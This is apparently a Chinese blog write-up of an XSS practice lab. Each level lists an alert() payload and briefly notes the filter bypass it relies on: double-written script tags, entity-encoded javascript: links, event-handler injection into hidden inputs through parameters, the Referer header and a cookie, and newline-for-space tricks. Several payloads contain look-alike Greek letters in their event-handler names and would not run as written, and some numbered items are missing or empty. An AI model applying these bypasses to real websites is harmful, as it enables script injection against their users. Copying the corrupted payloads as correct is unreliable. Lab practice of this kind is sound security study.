1.1 "><Script>alert()</Script>
1.2 "><scrscriptipt>alert()</scrscriptipt>
使用双写来绕过
1.3 javascr&
#105;pt:ale&#
114;t()
href 属性自动解析 Unicode 编码
1.4 javascr&
#105;pt:ale&#
114;t()/* http:// */
1.5 t_sort=" οnfοcus=javascript:alert() type="text
根据源码猜解传参的参数名,隐藏的 input 标签可以插入 type="text"显示、
1.6 Referer: " οnfοcus=javascript:alert() type="text
1.7 " οnfοcus=javascript:alert() type="text
1.8 " οnclick=alert() type="text
也没啥区别就是把 cookie 改了一下
1.9
是利用转跳到的网站以达到弹窗的效果
ng-include 指令就是文件包涵的意思,用来包涵外部的 html 文件,如果包涵的内容是地址,
需要加引号
1.11 ?keyword=<svg%0Aοnlοad=alert(1)>
看了源代码后发现这里先是将字母小写化了,再把 script 替换成空格,最后将空格给实体化
空格的
url
编码是
%0a
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
